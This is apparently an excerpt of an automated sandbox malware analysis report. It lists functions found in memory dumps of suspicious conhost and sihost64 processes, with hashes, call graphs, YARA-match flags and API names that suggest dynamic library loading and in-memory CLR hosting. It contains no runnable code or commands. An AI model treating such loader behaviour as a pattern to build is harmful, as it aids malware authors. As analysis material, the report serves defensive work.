                                                                  Function 00007FFD9B8A03F3 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 593 7ffd9b8a03f3-7ffd9b8a0411 598 7ffd9b8a03e9-7ffd9b8a03f1 593->598 599 7ffd9b8a0413-7ffd9b8a0428 593->599 598->599 605 7ffd9b8a0487-7ffd9b8a04b0 599->605 606 7ffd9b8a042a-7ffd9b8a0486 599->606 609 7ffd9b8a04ba-7ffd9b8a04d8 605->609 606->605
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd59179c0e7df223beb1827dbab353c0d8ac5b498318f646fa7e6d07dc00b36c
                                                                  • Instruction ID: 47062b3439741998e01bb08af16af2eb094aeac8ef8c25530dd2415ce6755da5
                                                                  • Opcode Fuzzy Hash: bd59179c0e7df223beb1827dbab353c0d8ac5b498318f646fa7e6d07dc00b36c
                                                                  • Instruction Fuzzy Hash: 6C31192161F6CA5FE7219B7488745AA7FA0FF46614F0900BBC0D88A097C91C690AC366
                                                                  Function 00007FFD9B8A05B5 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21847dde42a783dc37a0d0176100fd893d422ed5ebaab33f468ccca2f39c6528
                                                                  • Instruction ID: 8128153aff487832bfc42de5163bfecb4cd1c62d1e4235a234ebe5d8a9762e7c
                                                                  • Opcode Fuzzy Hash: 21847dde42a783dc37a0d0176100fd893d422ed5ebaab33f468ccca2f39c6528
                                                                  • Instruction Fuzzy Hash: A921B630B196494FD759ABB4C865BAE76E1EF4A304F1104BDD00EDB2E7CE2D5881C792
                                                                  Function 00007FFD9B8A0628 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cccaacb56187f6aebb301ff28e20be503e20b4cb0eed72f50dc7441136df53d
                                                                  • Instruction ID: a81083a06f94125f9cbae351b7c0e20264a029475cb1dd079b826b3f6fd4e07d
                                                                  • Opcode Fuzzy Hash: 9cccaacb56187f6aebb301ff28e20be503e20b4cb0eed72f50dc7441136df53d
                                                                  • Instruction Fuzzy Hash: 13219530B196494FE749ABB48466BAE76E1EF49304F1104BDD00EDB2E7CE2D5841C792
                                                                  Function 00007FFD9B8A6610 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 244f000b7c289c4ea147c519378b00ed2578d558119caa3d1eddd14a98156cfa
                                                                  • Instruction ID: d0b39066cd16e68a6bcf3efbbe0282ea5d2c38ea5ea8daee753fc8781c4d38d3
                                                                  • Opcode Fuzzy Hash: 244f000b7c289c4ea147c519378b00ed2578d558119caa3d1eddd14a98156cfa
                                                                  • Instruction Fuzzy Hash: 75117B21E1D9CD0FEB4AAB7894A6BE67B90EF56310F0441F6D45DC71CFDE28A80583A1
                                                                  Function 00007FFD9B8A0118 Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 883aa52eb40b9a4917309818c79cd3d30a31805e8d5a26546531072355ef98fb
                                                                  • Instruction ID: e22f27103954c9da442241bb5ae05a2bed16da09870e8e047995342b0b1d1864
                                                                  • Opcode Fuzzy Hash: 883aa52eb40b9a4917309818c79cd3d30a31805e8d5a26546531072355ef98fb
                                                                  • Instruction Fuzzy Hash: F6012B31B19D8D4AEF89AF6890A1BFA77A0EF98304F0045B6D41DC71CFDE29A8058391
                                                                  Function 00007FFD9B8A0724 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58945e3dac9c185330386e6333afbc2923d9b13c63996b17cb12153a23bffb86
                                                                  • Instruction ID: 7c04d1976ebcd9349e6224518d5cd43dd381a5983ae44c21245feb3703287d13
                                                                  • Opcode Fuzzy Hash: 58945e3dac9c185330386e6333afbc2923d9b13c63996b17cb12153a23bffb86
                                                                  • Instruction Fuzzy Hash: CC019230A19A5D4FD749EFB888665EEB7E1EF49704B1100BED40ACB2D6CE396D42C742
                                                                  Function 00007FFD9B8A0505 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6ff951bf2ee647c9dfa907628e7d196aea54593042ed8dd69d28f52978072fc
                                                                  • Instruction ID: 2fa91484418e93a2723c322c362d06a18e913596927852e86d9a52d672022d67
                                                                  • Opcode Fuzzy Hash: c6ff951bf2ee647c9dfa907628e7d196aea54593042ed8dd69d28f52978072fc
                                                                  • Instruction Fuzzy Hash: CB015E70E1A90E8FDBA4EFA88465AAC77E1EF59705F11007DD00ED72A6CE39AC41CB11
                                                                  Function 00007FFD9B8A0567 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7532e7fc04cd8121ceb105e7a97a304204d001a12171295a503ef1b5e6994765
                                                                  • Instruction ID: d038b993f14b8fd421c27f40befa26da6320c9b62161cd54a3ff93a36046f4a2
                                                                  • Opcode Fuzzy Hash: 7532e7fc04cd8121ceb105e7a97a304204d001a12171295a503ef1b5e6994765
                                                                  • Instruction Fuzzy Hash: 22F0E920B1A71A3FD351EFF88CE99AE25C6CFC716474100BDD449C72E9DE1C9C054216
                                                                  Function 00007FFD9B8A11E0 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23e576ce6903603048644502fff64630c6c2d5043aa51752734cf0c386613865
                                                                  • Instruction ID: c9f24aab1d59aa9ac3e95178f86570badccfd54be8ddfcccda888b199f879cf4
                                                                  • Opcode Fuzzy Hash: 23e576ce6903603048644502fff64630c6c2d5043aa51752734cf0c386613865
                                                                  • Instruction Fuzzy Hash: ADE08021F2CC1D0F9794FB3C5495EA562D2EBDC31075545B6E40CC729AED24DC518781

                                                                  Non-executed Functions

                                                                  Function 000001575946E90E Relevance: .5, Instructions: 485COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                                  • Instruction ID: 5cbe64ee918b41c3a6de789f10cd1cb40c1540abda8fa7868f971b1a80f28dc6
                                                                  • Opcode Fuzzy Hash: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                                  • Instruction Fuzzy Hash: 78E181B0628E458BDB69DF58D8867EB73D1FB95311F148229D88BCB1C1EB34EC16C681
                                                                  Function 000001575946ED6A Relevance: .3, Instructions: 283COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                                  • Instruction ID: 998024c9cd3316be01db4a637c03f2bad2f7aafeaae9a34a63b5da075429e336
                                                                  • Opcode Fuzzy Hash: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                                  • Instruction Fuzzy Hash: 5FA12F71518A4C8FDB55EF28C889BEA77E9FBA8315F10466EE44BC7160EB30DA45CB40
                                                                  Function 000001575946D4D2 Relevance: .3, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                                  • Instruction ID: ffe9fe850661f7838bd0586d6ceb43bd97c648ddcf2cff22d0de4d32d36b70ed
                                                                  • Opcode Fuzzy Hash: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                                  • Instruction Fuzzy Hash: 328165B0618B498BDB59DF24DC957EAB7D4FB99301F00462DD49AC6181EF30E945CAC2

                                                                  Execution Graph

                                                                  Execution Coverage:29.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:15
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 291 4023f2 _controlfp 292 4010c4 2 API calls 291->292 293 402473 292->293 277 4022fa 278 40232c 277->278 281 40224f 278->281 280 4023e5 282 402285 281->282 285 4010c4 282->285 284 4022be 284->280 286 402480 285->286 287 4010e7 memset 286->287 288 40115b 287->288 289 401214 sprintf 288->289 290 4012bd 289->290 290->284

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_004090C0 1 Function_00401443 2 Function_004010C4 14 Function_004019D8 2->14 15 Function_00401D58 2->15 34 Function_00401000 2->34 46 Function_00401D18 2->46 47 Function_00401C98 2->47 59 Function_00401D98 2->59 3 Function_004017C6 4 Function_004024C7 5 Function_004022CB 6 Function_0040224F 6->2 18 Function_00402158 6->18 25 Function_004021EC 6->25 7 Function_00401BD8 27 Function_004018EF 7->27 8 Function_00401F58 8->27 9 Function_00401DD8 9->27 10 Function_00401C58 10->27 11 Function_00401B58 11->27 12 Function_00401AD8 12->27 13 Function_00401A58 13->27 14->27 15->27 16 Function_00401CD8 16->27 17 Function_00402058 17->27 19 Function_004020D8 19->27 20 Function_00401FD8 20->27 21 Function_00401E58 21->27 22 Function_00401ED8 22->27 23 Function_00409CDA 24 Function_004021E5 26 Function_0040946D 64 Function_004014B4 27->64 28 Function_00401970 29 Function_004023F2 29->2 30 Function_00409E76 31 Function_00402477 32 Function_00409678 33 Function_004022FA 33->6 35 Function_00409004 36 Function_00401784 37 Function_00409384 38 Function_00409686 39 Function_00402487 40 Function_00409989 41 Function_00409D8A 42 Function_00409290 43 Function_00402497 44 Function_00401E98 44->27 45 Function_00401F98 45->27 46->27 47->27 48 Function_00401B18 48->27 49 Function_00401A18 49->27 50 Function_00401998 50->27 51 Function_00401A98 51->27 52 Function_00401B98 52->27 53 Function_00401C18 53->27 54 Function_00402118 54->27 55 Function_00401F18 55->27 56 Function_00402098 56->27 57 Function_00402018 57->27 58 Function_00401E18 58->27 59->27 60 Function_00409D9A 61 Function_00409D22 62 Function_004024A7 63 Function_004094AC 64->1 64->28 65 Function_004024B7 66 Function_004096B7 67 Function_004092B8 68 Function_004010BD

                                                                  Executed Functions

                                                                  Function 004010C4 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID: /sihost64
                                                                  • API String ID: 4041149307-4205773068
                                                                  • Opcode ID: 340b51d94c547dc9600aa4fc2f31ce9ed4fc2ceb995e8576dbd42bee5433ba49
                                                                  • Instruction ID: aca2fdf8534d1f55052996b791b38ba642986683fcb313dcb59f68fb06fbf62c
                                                                  • Opcode Fuzzy Hash: 340b51d94c547dc9600aa4fc2f31ce9ed4fc2ceb995e8576dbd42bee5433ba49
                                                                  • Instruction Fuzzy Hash: 55712A61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3CCA44C744
                                                                  Function 00401000 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                  Strings
                                                                  • 97casc*52>ps6cz+rgg<=c,g=>+d:.z+, xrefs: 00401098
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 97casc*52>ps6cz+rgg<=c,g=>+d:.z+
                                                                  • API String ID: 0-363803121
                                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                  Function 004022FA Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a0ac8e6eccd96365346d7e5f4705697b6c7359cb9289b894d2f67c7d5b7cf9d
                                                                  • Instruction ID: 712002830166568aab168b156390cc9c0f9dd4445f1c5f10fc4b9559ecfc971b
                                                                  • Opcode Fuzzy Hash: 4a0ac8e6eccd96365346d7e5f4705697b6c7359cb9289b894d2f67c7d5b7cf9d
                                                                  • Instruction Fuzzy Hash: 83211CA4301A1488EA80DB57DE5539933A4BB49FC8F40453A9F4CB73E5EEBCC9018358
                                                                  Function 0040224F Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1784760757.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 0000000A.00000002.1784645333.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784864968.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.1784889647.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_sihost64.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID:
                                                                  • API String ID: 4041149307-0
                                                                  • Opcode ID: 4a964056c5c93370836b2055aa88bb79ebf9a1f25246f745588850a4ea836d32
                                                                  • Instruction ID: b0320e2237b37ba28e1691a43af3f9c87918e2f692b894f33fb3e2e628c141ca
                                                                  • Opcode Fuzzy Hash: 4a964056c5c93370836b2055aa88bb79ebf9a1f25246f745588850a4ea836d32
                                                                  • Instruction Fuzzy Hash: 1B01E4B6701B488DDB40DF66DD8138833A4B708BC8F00492AAF4CA7BA9DA78C6118748

                                                                  Execution Graph

                                                                  Execution Coverage:13.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:19
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 1914 299653036af LoadLibraryA 1915 299653036c7 1914->1915 1916 29965304506 1917 29965304528 1916->1917 1918 29965304654 LoadLibraryA 1917->1918 1919 29965304669 1917->1919 1926 2996530457c 1917->1926 1918->1917 1919->1926 1927 2996530471d 1919->1927 1933 299653036a2 1919->1933 1921 299653046f3 1922 299653046f7 1921->1922 1928 299653037ba LoadLibraryA 1921->1928 1922->1921 1922->1926 1925 2996530470c 1925->1926 1925->1927 1927->1926 1930 299653042b2 1927->1930 1929 299653037df 1928->1929 1929->1925 1931 299653042f2 CLRCreateInstance 1930->1931 1932 2996530430b 1930->1932 1931->1932 1932->1926 1934 299653036af LoadLibraryA 1933->1934 1935 299653036c7 1934->1935 1935->1921

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00007FFD9BAA3519 1 Function_00000299653036AF 96 Function_0000029965305C5E 1->96 2 Function_0000029965305DAF 3 Function_00007FFD9BAA050D 66 Function_00007FFD9BAA0090 3->66 4 Function_00007FFD9BAA040D 5 Function_00000299653042B2 6 Function_00000299653041B2 7 Function_00007FFD9BAA0112 8 Function_0000029965305C9A 9 Function_00007FFD9BAA220C 10 Function_00000299653036A2 10->96 11 Function_00007FFD9BAA0802 12 Function_00007FFD9BAA0102 13 Function_00007FFD9BAA0901 14 Function_00007FFD9BAA0401 15 Function_0000029965303B8A 115 Function_0000029965305752 15->115 16 Function_00007FFD9BAA03ED 17 Function_0000029965304192 18 Function_0000029965305892 19 Function_00007FFD9BAA00F2 20 Function_00007FFD9BAA02F4 21 Function_00007FFD9BAA27E8 42 Function_00007FFD9BAA2938 21->42 22 Function_0000029965305C7E 23 Function_0000029965303E7E 24 Function_00007FFD9BAA0CEC 25 Function_00007FFD9BAA2CEB 26 Function_00007FFD9BAA12DE 112 Function_00007FFD9BAA15AE 26->112 27 Function_00007FFD9BAA53E0 28 Function_00007FFD9BAA04E1 29 Function_00007FFD9BAA1E59 30 Function_00007FFD9BAA4F52 30->27 31 Function_00007FFD9BAA0852 74 Function_00007FFD9BAA0580 31->74 75 Function_00007FFD9BAA0080 31->75 32 Function_00007FFD9BAA3952 33 Function_00007FFD9BAA1253 34 Function_00007FFD9BAA3753 35 Function_00007FFD9BAA0348 36 Function_00007FFD9BAA3348 37 Function_00007FFD9BAA3C48 38 Function_00000299653056DE 38->15 39 Function_00000299653059E2 76 Function_0000029965305C26 39->76 40 Function_00007FFD9BAA1636 41 Function_00000299653056CA 43 Function_00007FFD9BAA0D37 44 Function_00007FFD9BAA0A3A 44->24 44->75 45 Function_0000029965305DCF 46 Function_00007FFD9BAA2D2D 47 Function_0000029965303ED2 48 Function_00000299653038D2 48->18 48->22 48->115 49 Function_00000299653041D2 49->8 50 Function_00000299653056D2 51 Function_00007FFD9BAA3132 52 Function_00000299653048D6 53 Function_00000299653037BA 53->96 54 Function_00007FFD9BAA0A2A 55 Function_00007FFD9BAA0929 56 Function_00000299653041BE 57 Function_00000299653056BE 58 Function_00007FFD9BAA0C20 58->75 59 Function_00007FFD9BAA2E95 60 Function_00007FFD9BAA0F98 60->33 61 Function_000002996530012D 62 Function_00007FFD9BAA1799 63 Function_0000029965303E2E 64 Function_00007FFD9BAA1A9C 70 Function_00007FFD9BAA1C7E 64->70 65 Function_00007FFD9BAA338D 65->0 66->11 110 Function_00007FFD9BAA07BA 66->110 67 Function_00007FFD9BAA2B90 67->25 68 Function_00007FFD9BAA0085 69 Function_000002996530581E 71 Function_00007FFD9BAA477E 111 Function_00007FFD9BAA4ABC 71->111 72 Function_00007FFD9BAA297D 73 Function_0000029965304122 74->11 74->110 77 Function_00007FFD9BAA3175 77->36 78 Function_00007FFD9BAA0E78 79 Function_0000029965303E0C 80 Function_0000029965304D0E 80->8 80->22 80->49 80->96 103 Function_0000029965305466 80->103 81 Function_00007FFD9BAA237C 90 Function_00007FFD9BAA2563 81->90 82 Function_00007FFD9BAA0D6D 83 Function_00007FFD9BAA226D 84 Function_00007FFD9BAA4B66 118 Function_00007FFD9BAA4EA5 84->118 85 Function_00007FFD9BAA0368 86 Function_00007FFD9BAA355D 86->34 87 Function_00007FFD9BAA0561 87->11 87->110 88 Function_0000029965304506 88->5 88->10 88->18 88->22 88->38 88->39 88->48 88->52 88->53 88->80 92 Function_000002996530516A 88->92 88->96 114 Function_0000029965303D52 88->114 88->115 89 Function_00007FFD9BAA4664 91 Function_0000029965303E6A 92->22 92->47 93 Function_00007FFD9BAA0CDB 94 Function_00007FFD9BAA18CD 95 Function_00007FFD9BAA54C6 97 Function_000002996530425E 98 Function_0000029965300061 99 Function_00007FFD9BAA2FBD 99->51 100 Function_00007FFD9BAA1FC0 100->9 101 Function_00007FFD9BAA1CC1 101->29 102 Function_00007FFD9BAA40C1 103->96 103->97 104 Function_00007FFD9BAA19C4 105 Function_00007FFD9BAA26C4 106 Function_00007FFD9BAA3AC4 106->37 107 Function_00007FFD9BAA55C4 108 Function_0000029965300049 109 Function_00007FFD9BAA25B5 113 Function_0000029965300051 115->22 115->69 116 Function_00007FFD9BAA41A6 116->89 117 Function_00007FFD9BAA39A5 119 Function_00007FFD9BAA3CA9 119->102 120 Function_0000029965305D3F 121 Function_00007FFD9BAA039D 122 Function_00007FFD9BAA1E9D 123 Function_00007FFD9BAA379D 123->32 124 Function_00007FFD9BAA2AA0

                                                                  Executed Functions

                                                                  Function 0000029965304506 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 29965304506-29965304557 call 299653056de * 3 7 29965304589 0->7 8 29965304559-2996530455c 0->8 9 2996530458c-2996530459d 7->9 8->7 10 2996530455e-29965304561 8->10 10->7 11 29965304563-2996530457a 10->11 13 2996530457c-29965304583 11->13 14 2996530459e-299653045c9 call 29965305c5e call 29965305c7e 11->14 13->7 15 29965304585 13->15 20 299653045cb-29965304600 call 29965305892 call 29965305752 14->20 21 29965304606-2996530461d call 299653056de 14->21 15->7 20->21 30 29965304862-29965304873 20->30 21->7 26 29965304623-29965304624 21->26 28 2996530462a-29965304630 26->28 31 29965304669-29965304673 28->31 32 29965304632 28->32 33 29965304875-2996530487f 30->33 34 299653048a6-299653048c7 call 29965305c7e 30->34 36 299653046a1-299653046aa 31->36 37 29965304675-29965304690 call 299653056de 31->37 35 29965304634-29965304636 32->35 33->34 40 29965304881-2996530489f call 29965305c7e 33->40 65 299653048c9 34->65 66 299653048cd-299653048cf 34->66 41 29965304650-29965304652 35->41 42 29965304638-2996530463e 35->42 38 299653046ac-299653046b6 call 299653038d2 36->38 39 299653046c5-299653046c8 36->39 37->30 56 29965304696-2996530469f 37->56 38->30 57 299653046bc-299653046c3 38->57 39->30 46 299653046ce-299653046d8 39->46 40->34 41->31 49 29965304654-29965304667 LoadLibraryA 41->49 42->41 48 29965304640-2996530464e 42->48 53 299653046da-299653046db 46->53 54 299653046e2-299653046e9 46->54 48->35 48->41 49->28 53->54 58 299653046eb-299653046ec 54->58 59 2996530471d-29965304721 54->59 56->36 56->37 57->54 64 299653046ee call 299653036a2 58->64 61 299653047fd-29965304805 59->61 62 29965304727-29965304749 59->62 67 29965304857-2996530485d call 29965304d0e 61->67 68 29965304807-2996530480d 61->68 62->30 76 2996530474f-29965304769 call 29965305c5e 62->76 69 299653046f3-299653046f5 64->69 65->66 66->9 67->30 72 2996530480f-29965304815 68->72 73 29965304824-29965304836 call 299653042b2 68->73 74 29965304704-29965304707 call 299653037ba 69->74 75 299653046f7-299653046fe 69->75 72->30 77 29965304817-29965304822 call 2996530516a 72->77 87 29965304848-29965304855 call 29965303d52 73->87 88 29965304838-29965304843 call 299653048d6 73->88 83 2996530470c-2996530470e 74->83 75->30 75->74 89 29965304789-299653047b2 76->89 90 2996530476b-2996530476e 76->90 77->30 83->59 84 29965304710-29965304717 83->84 84->30 84->59 87->30 88->87 89->30 98 299653047b8-299653047f8 89->98 90->61 94 29965304774-29965304787 call 299653059e2 90->94 99 299653047fa-299653047fb 94->99 98->30 98->99 99->61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction ID: bc41dddcdaf23efc60157b6934667904614708d6932eea93ef278d77e867f980
